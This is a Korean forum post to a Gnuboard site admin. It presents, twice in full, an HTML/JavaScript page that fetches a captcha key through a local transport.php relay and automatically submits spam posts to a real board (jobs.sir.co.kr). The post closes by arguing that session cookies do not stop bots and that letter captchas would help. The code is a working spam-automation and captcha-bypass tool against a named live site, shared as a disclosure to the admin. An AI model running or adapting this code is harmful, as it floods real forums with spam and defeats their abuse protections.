관리자님 성공했습니다.... 정보
관리자님 성공했습니다....- jacobswell 자기소개 아이디로 검색 회원게시물 (211.♡.♡.36)
오직 php와 javascript로 성공했습니다. 확인해보세요. ^^
댓글 2개
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>1 > sdfsdfsdfsdfsdf > 글쓰기</title>
</head>
<script type="text/javascript" src="./md5.js"></script>
<body topmargin="0" leftmargin="0" >
그누보드에 글을 올려볼까요...
<button id="post_btn" onclick="post();">글 올리기</button> <input type="text" value="" size="5" id="display_key" /><br />
<script type="text/javascript">
/**
 * Creates the HTTP request object the rest of the page uses.
 *
 * When window.ActiveXObject is present the two ActiveX ProgIDs are tried
 * in order (the newer "Msxml2.XMLHTTP" first, then the older
 * "Microsoft.XMLHTTP"); otherwise the native XMLHttpRequest constructor
 * is used when the window exposes one.
 *
 * @returns {Object|null} the request object, or null when nothing could
 *     be constructed.
 */
function getHttpRequest()
{
    if (window.ActiveXObject) {
        // The ActiveX branch never falls through to the native constructor.
        var progIds = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
        for (var i = 0; i < progIds.length; i++) {
            try {
                return new ActiveXObject(progIds[i]);
            }
            catch (unavailable) {
                // This ProgID is not registered; try the next one.
            }
        }
        return null;
    }

    if (!window.XMLHttpRequest) {
        return null;
    }

    try {
        return new XMLHttpRequest();
    }
    catch (unavailable) {
        return null;
    }
}
// Field values for the demonstration submission. send() reads name, id and
// password from here; subject and content are not read by any function in
// this listing (send() receives those as arguments instead).
var data = {
    id: '',
    name: '임시자',
    password: '1234',
    subject: 'spammer',
    content: 'spam content'
};

// Declared but never referenced by the functions in this listing.
var phpsessid = '';

// A single request object shared by post() and send(); it is null when
// getHttpRequest() could not construct one.
var req = getHttpRequest();
/**
 * Click handler for the "post_btn" button: asks the local transport.php
 * relay for a captcha key and, when one comes back, passes it to process().
 *
 * The relay is told through query parameters to GET the board's
 * kcaptcha_session.php. What transport.php does with the
 * transport_phpsessid and transport_kcaptcha flags is not visible in this
 * listing - presumably it keeps the session cookie and resolves the captcha
 * server-side; confirm against transport.php.
 *
 * Defender's note: no captcha image is ever shown to a person here; the key
 * arrives as a field of the relay's response and is forwarded unchanged.
 */
function post()
{
var url = 'http://localhost/spammer/transport.php?transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/kcaptcha_session.php')+'&transport_method=get&transport_phpsessid=true&transport_kcaptcha=true';
// Clear the key left in the text box by a previous click.
document.getElementById('display_key').value = '';
// Third argument false = synchronous request: the page blocks until the relay answers.
req.open('GET', url, false);
req.onreadystatechange = function() {
// readyState 4 = request finished; only a 200 response is processed.
if (req.readyState == 4) {
if (req.status == 200) {
//alert(req.responseText);
// NOTE(review): eval() runs whatever the relay returns as script in this
// page. If the relay emits strict JSON, JSON.parse(req.responseText) reads
// the same object without executing it.
var json_data = eval('('+req.responseText+')');
// A response without a truthy "key" field is ignored silently.
if (json_data.key) {
document.getElementById('display_key').value = json_data.key;
process(json_data.key);
}
}
}
};
req.send(null);
}
/**
 * Builds a test subject and body that share one random number between
 * 1 and 10000 and hands them to send() together with the captcha key.
 *
 * @param {*} key - captcha key obtained by post(); forwarded unchanged.
 */
function process(key)
{
    var suffix = (Math.floor(Math.random() * 10000) + 1).toString();
    send('테스트' + suffix, '테스트 본문 ' + suffix, key);
}
/**
 * Sends one form submission for the board's write_update.php through the
 * local transport.php relay, reusing the shared `req` object.
 *
 * The form body carries the relay's own transport_* options followed by the
 * board's fields: wr_name, mb_id and mb_password (taken from the global
 * `data`), wr_subject, wr_content, wr_key, and a fixed bo_table.
 *
 * @param {string} subject - value sent as wr_subject.
 * @param {string} content - value sent as wr_content.
 * @param {*} key - captcha key sent as wr_key.
 *
 * Defender's note: nothing between the key request in post() and this
 * submission requires a person, so the controls this flow exercises are the
 * board's server-side ones (captcha strength, posting limits).
 */
function send(subject, content, key)
{
var url = 'http://localhost/spammer/transport.php';
// transport_noresponse=true is an option of the relay; its effect is not visible in this listing.
var param = 'transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/write_update.php')+'&transport_method=post&transport_noresponse=true';
// NOTE(review): encodeURI() leaves "&", "=", "+" and "#" unescaped, so a value
// containing them would shift the field boundaries of this form body;
// encodeURIComponent() is the per-value encoder.
param += '&wr_name='+encodeURI(data.name)+'&mb_id='+encodeURI(data.id)+'&mb_password='+encodeURI(data.password);
param += '&wr_subject='+encodeURI(subject);
param += '&wr_content='+encodeURI(content);
param += '&wr_key='+encodeURI(key);
// w and wr_id are sent empty; bo_table is a fixed literal.
param += '&w=&bo_table=dsfdfsdfsdsdf&wr_id=';
// Synchronous POST (third argument false).
req.open('POST', url, false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
// NOTE(review): Content-Length and Connection are managed by the browser;
// current XMLHttpRequest implementations do not let script set them.
// param.length also counts UTF-16 units, not bytes.
req.setRequestHeader('content-length', param.length);
req.setRequestHeader('Connection', 'close');
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
// Busy-waits 1.5 s after a 200 response; other statuses are ignored.
pause(1500);
}
}
};
req.send(param);
}
/**
 * Blocks the calling thread for roughly `milis` milliseconds by polling
 * the clock in a tight loop (a busy-wait, not a timer).
 *
 * @param {number} milis - how long to stall, in milliseconds.
 */
function pause(milis)
{
    var deadline = new Date().getTime() + milis;
    // Spin until the clock has moved strictly past the deadline.
    while (new Date().getTime() <= deadline) {
    }
}
</script>
</body>
</html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>1 > sdfsdfsdfsdfsdf > 글쓰기</title>
</head>
<script type="text/javascript" src="./md5.js"></script>
<body topmargin="0" leftmargin="0" >
그누보드에 글을 올려볼까요...
<button id="post_btn" onclick="post();">글 올리기</button> <input type="text" value="" size="5" id="display_key" /><br />
<script type="text/javascript">
/**
 * Creates the HTTP request object the rest of the page uses.
 *
 * When window.ActiveXObject is present the two ActiveX ProgIDs are tried
 * in order (the newer "Msxml2.XMLHTTP" first, then the older
 * "Microsoft.XMLHTTP"); otherwise the native XMLHttpRequest constructor
 * is used when the window exposes one.
 *
 * @returns {Object|null} the request object, or null when nothing could
 *     be constructed.
 */
function getHttpRequest()
{
    if (window.ActiveXObject) {
        // The ActiveX branch never falls through to the native constructor.
        var progIds = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
        for (var i = 0; i < progIds.length; i++) {
            try {
                return new ActiveXObject(progIds[i]);
            }
            catch (unavailable) {
                // This ProgID is not registered; try the next one.
            }
        }
        return null;
    }

    if (!window.XMLHttpRequest) {
        return null;
    }

    try {
        return new XMLHttpRequest();
    }
    catch (unavailable) {
        return null;
    }
}
// Field values for the demonstration submission. send() reads name, id and
// password from here; subject and content are not read by any function in
// this listing (send() receives those as arguments instead).
var data = {
    id: '',
    name: '임시자',
    password: '1234',
    subject: 'spammer',
    content: 'spam content'
};

// Declared but never referenced by the functions in this listing.
var phpsessid = '';

// A single request object shared by post() and send(); it is null when
// getHttpRequest() could not construct one.
var req = getHttpRequest();
/**
 * Click handler for the "post_btn" button: asks the local transport.php
 * relay for a captcha key and, when one comes back, passes it to process().
 *
 * The relay is told through query parameters to GET the board's
 * kcaptcha_session.php. What transport.php does with the
 * transport_phpsessid and transport_kcaptcha flags is not visible in this
 * listing - presumably it keeps the session cookie and resolves the captcha
 * server-side; confirm against transport.php.
 *
 * Defender's note: no captcha image is ever shown to a person here; the key
 * arrives as a field of the relay's response and is forwarded unchanged.
 */
function post()
{
var url = 'http://localhost/spammer/transport.php?transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/kcaptcha_session.php')+'&transport_method=get&transport_phpsessid=true&transport_kcaptcha=true';
// Clear the key left in the text box by a previous click.
document.getElementById('display_key').value = '';
// Third argument false = synchronous request: the page blocks until the relay answers.
req.open('GET', url, false);
req.onreadystatechange = function() {
// readyState 4 = request finished; only a 200 response is processed.
if (req.readyState == 4) {
if (req.status == 200) {
//alert(req.responseText);
// NOTE(review): eval() runs whatever the relay returns as script in this
// page. If the relay emits strict JSON, JSON.parse(req.responseText) reads
// the same object without executing it.
var json_data = eval('('+req.responseText+')');
// A response without a truthy "key" field is ignored silently.
if (json_data.key) {
document.getElementById('display_key').value = json_data.key;
process(json_data.key);
}
}
}
};
req.send(null);
}
/**
 * Builds a test subject and body that share one random number between
 * 1 and 10000 and hands them to send() together with the captcha key.
 *
 * @param {*} key - captcha key obtained by post(); forwarded unchanged.
 */
function process(key)
{
    var suffix = (Math.floor(Math.random() * 10000) + 1).toString();
    send('테스트' + suffix, '테스트 본문 ' + suffix, key);
}
/**
 * Sends one form submission for the board's write_update.php through the
 * local transport.php relay, reusing the shared `req` object.
 *
 * The form body carries the relay's own transport_* options followed by the
 * board's fields: wr_name, mb_id and mb_password (taken from the global
 * `data`), wr_subject, wr_content, wr_key, and a fixed bo_table.
 *
 * @param {string} subject - value sent as wr_subject.
 * @param {string} content - value sent as wr_content.
 * @param {*} key - captcha key sent as wr_key.
 *
 * Defender's note: nothing between the key request in post() and this
 * submission requires a person, so the controls this flow exercises are the
 * board's server-side ones (captcha strength, posting limits).
 */
function send(subject, content, key)
{
var url = 'http://localhost/spammer/transport.php';
// transport_noresponse=true is an option of the relay; its effect is not visible in this listing.
var param = 'transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/write_update.php')+'&transport_method=post&transport_noresponse=true';
// NOTE(review): encodeURI() leaves "&", "=", "+" and "#" unescaped, so a value
// containing them would shift the field boundaries of this form body;
// encodeURIComponent() is the per-value encoder.
param += '&wr_name='+encodeURI(data.name)+'&mb_id='+encodeURI(data.id)+'&mb_password='+encodeURI(data.password);
param += '&wr_subject='+encodeURI(subject);
param += '&wr_content='+encodeURI(content);
param += '&wr_key='+encodeURI(key);
// w and wr_id are sent empty; bo_table is a fixed literal.
param += '&w=&bo_table=dsfdfsdfsdsdf&wr_id=';
// Synchronous POST (third argument false).
req.open('POST', url, false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
// NOTE(review): Content-Length and Connection are managed by the browser;
// current XMLHttpRequest implementations do not let script set them.
// param.length also counts UTF-16 units, not bytes.
req.setRequestHeader('content-length', param.length);
req.setRequestHeader('Connection', 'close');
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
// Busy-waits 1.5 s after a 200 response; other statuses are ignored.
pause(1500);
}
}
};
req.send(param);
}
/**
 * Blocks the calling thread for roughly `milis` milliseconds by polling
 * the clock in a tight loop (a busy-wait, not a timer).
 *
 * @param {number} milis - how long to stall, in milliseconds.
 */
function pause(milis)
{
    var deadline = new Date().getTime() + milis;
    // Spin until the clock has moved strictly past the deadline.
    while (new Date().getTime() <= deadline) {
    }
}
</script>
</body>
</html>
핵심 파일은 transport.php인데요... 이걸 올리면 이제 스팸글이 많이 올라오겠죠... 결국 PHPSESSID를 붙여 넣는 것도 의미가 없다는 이야기입니다. 세션 쿠키는 자동화된 클라이언트도 브라우저와 똑같이 받아서 다시 보낼 수 있기 때문입니다. 캡차를 단순히 숫자로만 할 경우에는 1~2초도 되지 않아 풀립니다. 캡차에 문자까지 넣는 것이 PHPSESSID를 붙이는 것보다 더 효과가 클 것 같은데요...